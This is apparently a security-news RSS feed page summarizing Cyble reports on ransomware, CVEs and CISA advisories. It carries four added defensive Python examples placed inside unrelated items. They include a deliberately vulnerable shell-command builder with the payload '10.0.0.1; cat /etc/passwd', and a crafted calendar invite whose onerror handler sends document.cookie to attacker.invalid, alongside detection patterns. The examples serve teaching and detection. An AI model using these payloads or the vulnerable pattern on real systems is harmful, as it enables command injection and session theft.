www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
Feed date: 2025-05-10T20:22:18+00:00

Cyble - CyberSecurity Firm: Ransomware Attacks April 2025: Qilin Emerges from Chaos
Global ransomware attacks in April 2025 declined to 450 from 564 in March – the lowest level since November 2024 – as major changes among the leading Ransomware-as-a-Service (RaaS) groups caused many affiliates to align with new groups. Still, the long-term trend for ransomware attacks remains decidedly upward (chart below), so April's decline could be reversed as soon as new RaaS leaders are established.
[Chart: Ransomware attacks by month, 2021-2025]
For now, the uncertainty at RansomHub – which went offline at the start of April but plans to return – resulted in new groups taking over the top global attack spots. Qilin, which gained affiliates from the RansomHub uncertainty, led all groups with 74 attacks claimed in April (chart below), followed by Akira at 70, Play with 50, Lynx with 31 attacks, and NightSpire at 24.
Published 2025-05-06T14:17:39+00:00 | Source: https://cyble.com/blog/qilin-tops-april-2025-ransomware-report/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8672355 | Tags: Ransomware, Malware, Vulnerability, Threat, Industrial, Prediction, Medical, Cloud, Technical

Cyble - CyberSecurity Firm: IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit
Overview
Cyble's vulnerability intelligence unit examined 26 vulnerabilities and 14 dark web exploit claims in recent reports to clients and flagged 10 of the vulnerabilities as meriting high-priority attention by security teams.
The vulnerabilities, which can lead to system compromise and data breaches, affect Fortinet products, WordPress plugins, Linux and Android systems, and more.
The Top IT Vulnerabilities
Here are some of the vulnerabilities highlighted by Cyble vulnerability intelligence researchers in recent reports. CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762 are critical vulnerabilities in Fortinet FortiGate devices that have been actively exploited to gain unauthorized remote access. All three are pre-authentication memory corruption bugs in the SSL-VPN component that allow remote code execution (CVE-2022-42475 and CVE-2023-27997 are heap-based buffer overflows; CVE-2024-21762 is an out-of-bounds write), and attackers have chained them for initial access and privilege escalation. Recently, Fortinet revealed that attackers exploited these vulnerabilities to gain initial access and then used a novel post-exploitation technique to maintain persistent read-only access even after patches were applied. The technique involves creating a symbolic link (symlink) in the SSL-VPN language files folder that connects the user file system to the root file system, allowing attackers to evade detection and continue reading device configurations. CVE-2024-48887 is a critical unverified password change vulnerability in the Fortinet FortiSwitch GUI that could allow a remote, unauthenticated attacker to change adminis…
Published 2025-04-21T12:33:13+00:00 | Source: https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8665658 | Tags: Tool, Vulnerability, Threat, Patching, Mobile

Cyble - CyberSecurity Firm: Hacktivists Target Critical Infrastructure, Move Into Ransomware
Overview
According to a new Cyble report, hacktivists are increasingly moving beyond traditional activities such as DDoS attacks and website defacements into more sophisticated critical infrastructure and ransomware attacks.
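Added example for the Fortinet symlink persistence technique described in the IT Vulnerability Report item above (this is not Fortinet's or Cyble's code, and it is not part of the hacktivism item that follows). The check it implements is the generic one behind that technique: walk a directory that a web front end serves and report every symlink whose resolved target escapes that directory. The page does not give the real FortiGate path, so the served folder, its file names and the planted link are constructed in a temporary directory for the demonstration.

```python
"""Find symlinks in a served directory that resolve outside it.

Added example, not from Fortinet or Cyble. Paths and file names below are
constructed in a temp dir; the real FortiGate language-files path is not
given on the page.
"""
import os
import tempfile


def find_escaping_symlinks(served_dir: str):
    """Return (relative link path, raw link target) for every symlink under
    served_dir whose fully resolved target lies outside served_dir.

    A planted link like this is what lets an HTTP client of the served folder
    read files (device configuration included) it should never reach.
    """
    root = os.path.realpath(served_dir)
    findings = []
    # followlinks=False: never descend into a symlinked directory, just report it
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        # Symlinks to directories are listed in dirnames, symlinks to files in filenames
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)  # follows the whole symlink chain
            # The target is inside only if it is root itself or a descendant of root
            if os.path.commonpath([root, target]) != root:
                findings.append((os.path.relpath(path, root), os.readlink(path)))
    return findings


def demo():
    """Build a constructed served folder with one benign and one escaping symlink
    and return the names the scan flags."""
    with tempfile.TemporaryDirectory() as tmp:
        served = os.path.join(tmp, "lang")  # stands in for the language files folder
        os.makedirs(served)
        with open(os.path.join(served, "en.json"), "w", encoding="utf-8") as fh:
            fh.write("{}")
        # Benign: relative link to a sibling file inside the served folder
        os.symlink("en.json", os.path.join(served, "en_US.json"))
        # Planted: link that resolves to the root file system
        os.symlink("/", os.path.join(served, "cache"))
        return [name for name, _ in find_escaping_symlinks(served)]


if __name__ == "__main__":
    print(demo())
```

On a real appliance the same walk would be run against the directory the SSL-VPN front end exposes, after patching; a link pointing at `/` or at any path outside that directory is the indicator, regardless of its name.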
In a report for clients, Cyble said that hacktivism has "transformed into a complex instrument of hybrid warfare" with the rise of groups that have adopted more sophisticated attack techniques more commonly associated with nation-state actors and financially motivated threat groups. Hacktivism "is no longer confined to fringe ideological outbursts," according to the report. "It is now a decentralized cyber-insurgency apparatus, capable of shaping geopolitical narratives, destabilizing critical systems, and engaging directly in global conflicts across the digital domain." The Cyble report examined the most active hacktivist groups in the first quarter of 2025, the most targeted nations and sectors, emerging attack techniques, and more.
The Most Active Hacktivist Groups Target Critical Infrastructure
Pro-Russian hacktivists were the most active in the first quarter, led by NoName057(16), Hacktivist Sandworm…
Published 2025-04-15T08:22:39+00:00 | Source: https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8662999 | Tags: Ransomware, Tool, Vulnerability, Threat, Legislation, Industrial, Prediction, Cloud, Technical | Actor: APT 44

Cyble - CyberSecurity Firm: ICS Vulnerability Report: Energy, Manufacturing Device Fixes Urged by Cyble
Published 2025-04-10T05:20:09+00:00 | Source: https://cyble.com/blog/ics-vulnerability-report-energy-cyble/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8661332 | Tags: Tool, Vulnerability, Threat, Patching, Industrial, Medical, Commercial

Cyble - CyberSecurity Firm: IT Vulnerability Report: VMware, Microsoft Fixes Urged by Cyble
…or complete control of applications.
The Top IT Vulnerabilities
Here are the eight vulnerabilities highlighted by Cyble in recent reports. CVE-2025-2783 is a still-unclassified vulnerability in Google Chrome on Windows before version 134.0.6998.177, where an incorrect handle provided in unspecified circumstances in Mojo allows a remote attacker to perform a sandbox escape via a malicious file. Researchers reported that the vulnerability had been exploited to deploy malware in espionage attacks targeting Russian media and education organizations. CVE-2025-22230 is an authentication bypass vulnerability caused by improper access control in…
Published 2025-04-07T17:06:04+00:00 | Source: https://cyble.com/blog/it-vulnerability-microsoft-fixes-urged-by-cyble/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8660778 | Tags: Tool, Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: Ransomware Attack Levels Remain High as Major Change Looms
March saw notable events, including a potential change at the top of the ransomware world, persistent attacks, and the emergence of new groups. March 2025 ended on a surprising note when the onion-based data leak site (DLS) of RansomHub, the largest ransomware group over the past year, went offline, fueling speculation of a possible takeover. A few days later, rival DragonForce claimed to have taken control of RansomHub's infrastructure, raising the potential for a major shift in the ransomware landscape in the months ahead. At a time when ransomware attacks remain at record levels, Ransomware-as-a-Service (RaaS) groups package and deliver malware.
It is not yet clear whether RansomHub's run is over, but the RaaS group had a remarkable run over the past year, its staying power driven by perceptions of greater transparency than predecessor groups, predictable payments, and well-packaged attack playbooks for affiliates, in Cyble's analysis.
Ransomware Attacks Remain High
Ransomware attacks were down from February's record levels, but they still remain above…
Published 2025-04-04T08:22:37+00:00 | Source: https://cyble.com/blog/ransomware-attack-levels-remain-high-as-major-change-looms/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8660196 | Tags: Ransomware, Malware, Vulnerability, Threat, Cloud

Cyble - CyberSecurity Firm: Cyble Sensors Detect Exploit Attempts on Ivanti, AVTECH IP Cameras
Overview
Vulnerabilities in Ivanti products, AVTECH IP cameras, and WordPress plugins were recently among the dozens of exploit attempts detected by Cyble honeypot sensors. The attack attempts were detailed in the threat intelligence company's weekly sensor intelligence reports. The Cyble reports also examined persistent attacks on Linux systems and on network and IoT devices, as threat actors scan for vulnerable devices for ransomware attacks and to add to DDoS and crypto-mining botnets. The reports also examined banking malware, brute-force attacks, vulnerable ports, and phishing campaigns. Here are some of the recent attack campaigns covered in the Cyble sensor reports.
Users could be vulnerable to attack if the affected product versions are not patched and mitigated.
Vulnerability Exploits Detected by Cyble
Ivanti Vulnerabilities: Here are some of the vulnerabilities targeted in the recent attack attempts detected…
Published 2025-03-25T09:36:32+00:00 | Source: https://cyble.com/blog/cyble-sensors-detect-exploit-attempts-on-ivanti-avtech-ip-cameras/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8658054 | Tags: Malware, Vulnerability, Threat, Patching, Industrial

Cyble - CyberSecurity Firm: FizzBuzz to FogDoor: Targeted Malware Campaign Exploits Job-Seeking Developers
A social engineering campaign targets developers through a malicious GitHub repository. Using a fake recruitment test named "FizzBuzz", the threat actor (TA) tricks victims into downloading an ISO file containing a seemingly harmless JavaScript exercise and a malicious LNK shortcut…
Published 2025-03-24T11:09:37+00:00 | Source: https://cyble.com/blog/fake-coding-challenges-steal-sensitive-data-via-fogdoor/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8657753 | Tags: Malware, Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: Underground Market Exploits and Active Threats: Key Takeaways from the Weekly Vulnerability Insights Report
Overview
The weekly vulnerability insights report to clients sheds light on the most pressing cybersecurity vulnerabilities that have been identified and exploited.
This weekly vulnerability insights report highlights the ongoing efforts of organizations to protect their systems and networks from cyber threats, focusing on critical vulnerabilities that demand immediate attention from security professionals. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) updated its Known Exploited Vulnerabilities (KEV) catalog to include several high-severity flaws that are actively targeted by attackers. During the week of March 12, 2025, CISA added several vulnerabilities to its KEV catalog, reflecting growing concern about hyperactive exploitation. Among these, CVE-2025-30066 stood out as a serious threat: a compromise of the tj-actions/changed-files GitHub Action, whose release tags were retroactively pointed at a malicious commit. The flaw allows attackers to execute arbitrary code on affected systems by exploiting improper validation in the…
Published 2025-03-21T10:36:30+00:00 | Source: https://cyble.com/blog/cyble-weekly-vulnerability-insights-report/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8657158 | Tags: Tool, Vulnerability, Threat, Patching, Prediction

Cyble - CyberSecurity Firm: ICS Vulnerability Report: Solar Energy, Cardiology Fixes Urged by Cyble
…vulnerabilities found in solar energy management and cardiology systems.
Critical ICS Vulnerabilities
Cyble noted that the vulnerabilities in Sungrow iSolarCloud "are among the significant ones, as they impact critical energy management systems."
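Added example for the CVE-2025-30066 item in the Weekly Vulnerability Insights summary above (it is not Cyble's code and not part of the ICS report item it sits in). A tag such as `v45` is mutable: whoever controls the action's repository, legitimately or not, can move it to a new commit, and every workflow referencing that tag picks up the new code on its next run. The check below scans a workflow file for third-party actions referenced by anything other than a full 40-hex commit SHA. The workflow text is constructed for the demo, and the SHA in it is a placeholder, not a real commit.

```python
"""Flag GitHub Actions `uses:` references that are not pinned to a commit SHA.

Added example, not from Cyble or from the tj-actions project. SAMPLE_WORKFLOW
is constructed for the demo; the 40-hex value in it is a placeholder.
"""
import re

# `uses:` value up to whitespace, quote or comment; tolerates the leading "- "
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)", re.MULTILINE)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_yaml: str):
    """Return [(action, ref)] for every `uses:` whose ref is not a 40-hex SHA.

    Local actions (./path) and container images (docker://...) are skipped:
    they are not repository tags and need a different control.
    """
    findings = []
    for ref_spec in USES_RE.findall(workflow_yaml):
        if ref_spec.startswith("./") or ref_spec.startswith("docker://"):
            continue
        action, _, ref = ref_spec.partition("@")
        if not ref:
            findings.append((action, "<no ref>"))   # defaults to the default branch
        elif not SHA_RE.match(ref):
            findings.append((action, ref))          # tag or branch: mutable
    return findings


# Constructed workflow for the demo. The SHA on the setup-node line is a
# placeholder that merely has the right shape; it does not refer to a real commit.
SAMPLE_WORKFLOW = """
name: ci
on: [pull_request]
jobs:
  changed:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Pinned by SHA
        uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4
      - uses: tj-actions/changed-files@v45
      - uses: ./.github/actions/local-step
      - uses: docker://alpine:3.19
      - uses: some-org/some-action@main
"""

if __name__ == "__main__":
    for action, ref in unpinned_actions(SAMPLE_WORKFLOW):
        print(f"unpinned: {action}@{ref}")
```

Pinning to a SHA does not make the pinned commit trustworthy; it only guarantees that what ran yesterday is what runs today, so a later tag move cannot silently swap the code. Run the scan over every file under `.github/workflows/` and treat each finding as a review item.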
The Android application and firmware A…
Published 2025-03-21T10:12:55+00:00 | Source: https://cyble.com/blog/ics-vulnerability-report-solar-fixes-urged-by-cyble/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8657159 | Tags: Tool, Vulnerability, Patching, Mobile, Industrial, Medical, Commercial

Cyble - CyberSecurity Firm: CISA Warns of Active Exploitation with Three New Vulnerabilities Added to KEV Catalog
CVE-2025-1316
This vulnerability, identified on March 4, 2025, is an OS command injection vulnerability that allows attackers to remotely execute arbitrary commands on the device. The Edimax IC-7100 does not properly neutralize special characters used in OS commands, leaving it open to exploitation. Malicious actors can craft specific requests to inject malicious code into the camera's operating system, leading to remote code execution and unauthorized access to the device. The impact of this vulnerability is severe, as it allows attackers to take control of the device, potentially accessing sensitive video surveillance data or compromising the network. A CVSS v4 score of 9.3 has been assigned to CVE-2025-1316, indicating the critical nature of the flaw.
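Added example of the bug class described for CVE-2025-1316 (this is not Edimax firmware, CISA's or Cyble's code, and the page does not say which IC-7100 request is affected; the "ping diagnostic" parameter is hypothetical). The vulnerable form splices a request parameter into a shell command string, so shell metacharacters in the parameter become additional commands; the hardened form validates the parameter against a strict allow-list and passes it as a single argv element with no shell at all.

```python
"""OS command injection: vulnerable command building beside a hardened form.

Added example, not vendor code. The 'host' parameter of a hypothetical camera
ping-diagnostic endpoint stands in for the unneutralized input.
"""
import ipaddress
import shlex
import subprocess


def build_ping_cmd_vulnerable(host: str) -> str:
    """VULNERABLE: the parameter is pasted into a shell string. If this string
    is run with shell=True (or system()), ';', '|', '`' and '$(...)' in `host`
    are interpreted by the shell."""
    return f"ping -c 1 {host}"


def shell_tokens(cmd: str) -> list:
    """Show how a POSIX shell tokenizes the vulnerable string: ';' is split out
    as an operator, so everything after it is a second, attacker-chosen command."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lexer)


def validate_host(host: str) -> str:
    """Hardened input check: accept only a literal IPv4/IPv6 address and
    return its canonical form. Everything else is rejected."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        raise ValueError(f"rejected host parameter: {host!r}") from None


def is_rejected(host: str) -> bool:
    """True when validate_host refuses the value."""
    try:
        validate_host(host)
        return False
    except ValueError:
        return True


def build_ping_argv_safe(host: str) -> list:
    """Hardened: validated value as one argv element; no shell ever sees it."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping_safe(host: str) -> int:
    """Execute the hardened form (argv list, shell=False) and return its exit code."""
    return subprocess.run(build_ping_argv_safe(host), capture_output=True).returncode


if __name__ == "__main__":
    payload = "10.0.0.1; cat /etc/passwd"
    print(shell_tokens(build_ping_cmd_vulnerable(payload)))  # ';' and 'cat' appear as tokens
    print(build_ping_argv_safe("10.0.0.1"))
    print(is_rejected(payload))
```

The allow-list is the part that matters: escaping with `shlex.quote` would also neutralize the metacharacters, but it leaves the attacker free to pass any string that `ping` itself will interpret, which is a larger surface than a device diagnostic needs.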
CISA strongly recommends that organizations using Edimax IC-7100 IP cameras take immediate steps to mitigate the risk, including network isolation, the use of…
Published 2025-03-20T14:07:29+00:00 | Source: https://cyble.com/blog/cisa-adds-cve-2025-1316-and-other-flaws/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656938 | Tags: Vulnerability, Threat, Legislation

Cyble - CyberSecurity Firm: Hybrid Threats and AI Form the DNA of EU's Organized Threat Landscape in 2025: Europol
Overview
Europol released the EU-SOCTA 2025 report, which offers a comprehensive look into the complex dynamics shaping serious and organized crime across Europe. Europol's analysis provides insight into the increasing intersection of cybercriminal activities, hybrid threats, and the exploitation of emerging technologies. Criminals are rapidly adapting to digital advancements, using technology to expand their reach, enhance their capabilities, and evade law enforcement, the report said.
Hybrid Threats: A Blurring of Crime and Conflict
Hybrid threats, which combine conventional criminal methods with advanced digital strategies, present significant risks. These tactics destabilize societies, exploit critical infrastructures, and create uncertainty. Criminal organizations now leverage methods traditionally associated with state-backed actors, including disinformation campaigns, targeted cyberattacks, and manipulation of public opinion. By exploiting vulnerabilities in interconnected systems, these actors disrupt supply chains, compromise sensitive data, and manipulate information on a large scale.
The blending of state-backed espionage and organized crime blurs the line between geopolitical conflict and tra…
Published 2025-03-20T14:02:25+00:00 | Source: https://cyble.com/blog/hybrid-threats-eu-socta-2025-report/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656939 | Tags: Malware, Tool, Vulnerability, Threat, Legislation, Medical

Cyble - CyberSecurity Firm: CISA Adds Two Critical Vulnerabilities (CVE-2025-24472 and CVE-2025-30066) to the Known Exploited Vulnerabilities Catalog
Published 2025-03-19T12:49:21+00:00 | Source: https://cyble.com/blog/cisa-alerts-users-of-cve-2025-24472/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656685 | Tags: Tool, Vulnerability, Threat

Cyble - CyberSecurity Firm: CERT NZ Shares Critical Advisory for CVE-2025-24813 Vulnerability in Apache Tomcat
Published 2025-03-19T08:35:18+00:00 | Source: https://cyble.com/blog/cert-nz-warns-of-cve-2025-24813-in-tomcat/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656638 | Tags: Vulnerability, Threat

Cyble - CyberSecurity Firm: SQLi, XSS, and SSRF: Breaking Down Zimbra's Latest Security Threats
Overview
Zimbra Collaboration Suite (ZCS) is a widely used email and collaboration platform. Security remains a top priority for administrators and users who rely on Zimbra for business communication. Recently, Zimbra has addressed several critical security issues, including stored cross-site scripting (XSS), SQL injection (SQLi), and server-side request forgery (SSRF). This article provides a detailed technical breakdown of these vulnerabilities, their potential impact, and recommended actions. Below is an in-depth analysis of these vulnerabilities.
1. Stored Cross-Site Scripting (XSS) - CVE-2025-27915
Affected Versions: ZCS 9.0, 10.0, and 10.1 (before 9.0.0 Patch 44, 10.0.13, and 10.1.5)
Patch Availability: Fixed in the latest patches
Description: This vulnerability resides in the Classic Web Client due to insufficient sanitization of HTML content in ICS calendar invite files. Attackers can embed malicious JavaScript inside an ICS file, which executes when a victim opens an email containing the ICS entry. Exploitation allows unauthorized actions within the victim's session, such as modifying email filters to redirect messages to an attacker's inbox.
Published 2025-03-18T13:50:51+00:00 | Source: https://cyble.com/blog/breaking-down-zimbras-latest-security-threats/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656463 | Tags: Vulnerability, Industrial, Technical

Cyble - CyberSecurity Firm: IT Vulnerability Report: Cyble Urges Fixes for Apple, PHP Flaws
Published 2025-03-18T13:33:57+00:00 | Source: https://cyble.com/blog/it-vulnerability-report-for-apple-php-flaws/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656464 | Tags: Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: Medusa Ransomware Hits Record Levels, FBI and CISA Provide Key Security Insights
The FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published a well-timed advisory on the Medusa ransomware group last week, as Cyble has detected an acceleration in the group's activities in recent months. Medusa ransomware attacks have been an almost daily occurrence so far this year, running nearly 45% higher than the group's 2024 attack levels, according to Cyble threat intelligence data.
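Added example for the Zimbra stored XSS item (CVE-2025-27915) above; it is not Zimbra's sanitizer or Cyble's code, and it is not part of the Medusa item it sits in. The payload class is HTML inside an iCalendar property that a web client renders, so a mail-gateway or mailbox-audit check can unfold the ICS attachment (RFC 5545 folds long lines, and a folded line can split a tag across two physical lines), undo the text escaping, and flag script tags, event-handler attributes and `javascript:` URLs in the properties clients render. Both invites below are constructed for the demo.

```python
"""Scan an iCalendar (ICS) invite for active HTML in rendered properties.

Added example, not Zimbra's or Cyble's code. MALICIOUS_ICS and BENIGN_ICS are
constructed for the demo; example.invalid / attacker.invalid are reserved names.
"""
import re

# Properties that calendar web clients commonly render, some of them as HTML
HTML_PROPS = ("DESCRIPTION", "X-ALT-DESC", "SUMMARY", "LOCATION", "COMMENT")

# Markup an invite has no business carrying
SUSPICIOUS = re.compile(
    r"<\s*script\b|<\s*iframe\b|<\s*object\b|<\s*embed\b|<\s*svg\b"
    r"|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def unfold_ics(text: str) -> list:
    """RFC 5545 unfolding: a line that starts with a space or tab continues the
    previous line. Scanning physical lines would miss a tag split by folding."""
    lines = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def ics_properties(text: str):
    """Yield (NAME, params, value) for each unfolded content line."""
    for line in unfold_ics(text):
        if not line or ":" not in line:
            continue
        head, _, value = line.partition(":")   # first ':' ends the name/params
        name, _, params = head.partition(";")
        yield name.upper(), params, value


def unescape_ics(value: str) -> str:
    """Undo RFC 5545 TEXT escaping so encoded markup is inspected as rendered."""
    return (value.replace("\\n", "\n").replace("\\N", "\n")
                 .replace("\\,", ",").replace("\\;", ";").replace("\\\\", "\\"))


def find_active_content(ics_text: str) -> list:
    """Return [(property, matched snippet)] for rendered properties carrying
    script or event-handler markup."""
    hits = []
    for name, _params, value in ics_properties(ics_text):
        if name not in HTML_PROPS:
            continue
        match = SUSPICIOUS.search(unescape_ics(value))
        if match:
            hits.append((name, match.group(0)))
    return hits


# Constructed invite: the X-ALT-DESC line is folded so 'onerror=' lands on the
# continuation line and would be missed by a per-line grep.
MALICIOUS_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "BEGIN:VEVENT",
    "UID:demo-1@example.invalid",
    "SUMMARY:Quarterly planning",
    "DESCRIPTION:Agenda attached.",
    "X-ALT-DESC;FMTTYPE=text/html:<html><body>Agenda<img src=x ",
    " onerror=\"fetch('https://attacker.invalid/'+document.cookie)\"></body></html>",
    "END:VEVENT",
    "END:VCALENDAR",
])

BENIGN_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "BEGIN:VEVENT",
    "UID:demo-2@example.invalid",
    "SUMMARY:Lunch",
    "X-ALT-DESC;FMTTYPE=text/html:<html><body><b>Noon</b> at the usual place</body></html>",
    "END:VEVENT",
    "END:VCALENDAR",
])

if __name__ == "__main__":
    print(find_active_content(MALICIOUS_ICS))  # [('X-ALT-DESC', 'onerror=')]
    print(find_active_content(BENIGN_ICS))     # []
```

A pattern list like this is a detection aid, not a sanitizer: the fix on the client side is to render untrusted HTML through a real HTML sanitizer (or as plain text), which is what the Zimbra patches address; the scan is useful for finding invites that already sit in mailboxes.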
The CISA-FBI advisory examines the Ransomware-as-a-Service (RaaS) group's tactics, techniques, and procedures (TTPs), indicators of compromise (IoCs), MITRE ATT&CK techniques, and more, based on recent FBI investigations.
Medusa Ransomware Attacks Surged in February
Cyble recorded 60 Medusa ransomware victims in the first 72 days of 2025, a pace of more than 300 attacks this year. That would be up considerably from the 211 Medusa ransomware attacks recorded by Cyble in 2024. Attack volume peaked in February, with 33 victims claimed by the group during the 28-day month. February was a record month for ransomware attacks in general, as recorded by Cyble data…
Published 2025-03-17T11:01:48+00:00 | Source: https://cyble.com/blog/medusa-ransomware-surges-as-fbi-share-insight/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8656193 | Tags: Ransomware, Tool, Vulnerability, Threat, Patching, Mobile, Medical

Cyble - CyberSecurity Firm: Apple Releases Security Updates and Rapid Security Responses for March 2025
Published 2025-03-13T11:35:12+00:00 | Source: https://cyble.com/blog/apple-releases-security-updates-and-rapid-security-responses-for-march-2025/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8655515 | Tags: Vulnerability, Mobile

Cyble - CyberSecurity Firm: ENISA's NIS360 Report Provides a Strategic View of Cybersecurity Maturity Across Critical Sectors
Published 2025-03-13T09:55:19+00:00 | Source: https://cyble.com/blog/enisa-nis2-cybersecurity-maturity-report/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8655491 | Tags: Tool, Vulnerability, Legislation, Cloud, Commercial

Cyble - CyberSecurity Firm: CISA Adds Five New Vulnerabilities to Its Known Exploited Vulnerabilities Catalog
Overview
The Cybersecurity and Infrastructure Security Agency (CISA) recently updated its Known Exploited Vulnerabilities (KEV) catalog by adding five vulnerabilities exploited by cybercriminals. These new entries highlight critical flaws in widely used software systems, including those impacting Advantive VeraCore and Ivanti Endpoint Manager (EPM). The identification of these vulnerabilities underscores the cybersecurity risks to federal and private organizations, as well as the need for urgent action. As part of its ongoing efforts to protect critical infrastructure, CISA highlighted the…
Published 2025-03-12T15:03:52+00:00 | Source: https://cyble.com/blog/cisa-adds-5-flaws-to-kev-catalog/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8655309 | Tags: Tool, Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: Cyble Sensors Detect Exploit Attempts on WordPress Plugins, Network Devices
Cyble honeypot sensors also detected attack attempts on vulnerabilities known to be targeted by APT groups.
Overview
Cyble honeypot sensors detected dozens of vulnerabilities targeted in attack attempts in recent weeks, including some known to be targeted by advanced persistent threat (APT) groups.
WordPress plugins, network devices, and firewalls were among the targets. The Cyble reports also examined persistent attacks on Linux systems and on network and IoT devices as threat actors continue to scan for vulnerable devices for ransomware attacks and to add to DDoS and crypto-mining botnets. The reports also examined banking malware, brute-force attacks, vulnerable ports, and phishing campaigns. Here are some of the recent attack campaigns covered in the Cyble sensor reports. Users could be vulnerable to attack if the affected product versions are not patched and mitigated.
WordPress Plugin Attack Attempts…
Published 2025-03-11T07:42:54+00:00 | Source: https://cyble.com/blog/cyble-sensors-wordpress-plugins-network-devices/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8654957 | Tags: Malware, Vulnerability, Threat, Patching, Mobile, Cloud

Cyble - CyberSecurity Firm: Three VMware Zero-Days Under Active Exploitation – What You Need to Know
Published 2025-03-10T12:10:47+00:00 | Source: https://cyble.com/blog/three-vmware-zero-days-under-active-exploitation/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8654866 | Tags: Vulnerability, Threat, Patching, Cloud, Technical

Cyble - CyberSecurity Firm: ICS Vulnerability Report: Critical Flaws in CCTV, RTOS and Genome Systems
Published 2025-03-10T09:02:21+00:00 | Source: https://cyble.com/blog/ics-vulnerability-cctv-rtos-and-genome-systems/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8654832 | Tags: Tool, Vulnerability, Threat, Patching, Industrial, Medical, Commercial

Cyble - CyberSecurity Firm: Weekly Vulnerability Insights Report: Addressing Critical Vulnerabilities and Rising Exploitation Risks
Overview
The latest Weekly Vulnerability Insights Report to clients sheds light on the critical vulnerabilities that were identified between February 26, 2025, and March 4, 2025. During this period, the Cybersecurity and Infrastructure Security Agency (CISA) incorporated nine new vulnerabilities into its Known Exploited Vulnerabilities (KEV) catalog, underlining the escalating risks posed by these security flaws. These vulnerabilities primarily affect prominent vendors like VMware, Progress, Microsoft, Hitachi Vantara, and Cisco, raising concerns about their potential exploitation. Among the vulnerabilities featured, CVE-2024-7014 and CVE-2025-21333 have gained notable attention due to their severe nature. Both flaws allow attackers to escalate privileges or gain unauthorized access, and the availability of public proofs of concept (PoCs) has further heightened the risk of exploitation. With attackers leveraging these PoCs, the chances of successful cyberattacks have been amplified, making it crucial for organizations to address these vulnerabilities promptly.
Critical Vulnerabilities of the Week
The CRIL analysis highlights a mix of high-severity vulnerabilities, many of which have been weaponized by threat actors across underground forums. Here are some of the critical vulnerabilities and their potential impact: CVE-2025-22226 (VMware ESXi, Workstation, an…
Published 2025-03-07T09:27:33+00:00 | Source: https://cyble.com/blog/weekly-vulnerability-insights-report/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8654494 | Tags: Tool, Vulnerability, Threat, Mobile

Cyble - CyberSecurity Firm: U.S. Indictments Shed Light on i-Soon Hacking Tools, Methods
U.S. indictments of 10 Chinese nationals are tied to the hacking and phishing tools and methods of the company i-Soon and the People's Republic of China's (PRC) network of private companies. A U.S. Department of Justice (DOJ) announcement of the indictments, which included screenshots of some of i-Soon's tools, and the unsealed indictments add further detail on the company's methods and tools. The indictments charge eight i-Soon employees and two PRC officials with conspiracy to commit computer intrusions and conspiracy to commit wire fraud. The defendants remain at large.
Alleged 7-Year Hacking Scheme
The indictments allege that i-Soon acted at the direction of the PRC's Ministry of State Security (MSS) and Ministry of Public Security (MPS). The DOJ release said the MSS and MPS "employed an extensive network of private companies and contractors in China to conduct unauthorized computer intrusions ('hacks') in the United States and elsewhere. One of those private companies was i-Soon." From 2016 to 2023, the DOJ said, i-Soon and its personnel "engaged in the numerous and widespread hacking of email accounts, cell phones, servers, and websites at the direction of, and in close coordination with, the PRC's MSS and MPS."
i-Soon generated tens of millions of dollars in revenue and at times had more than…
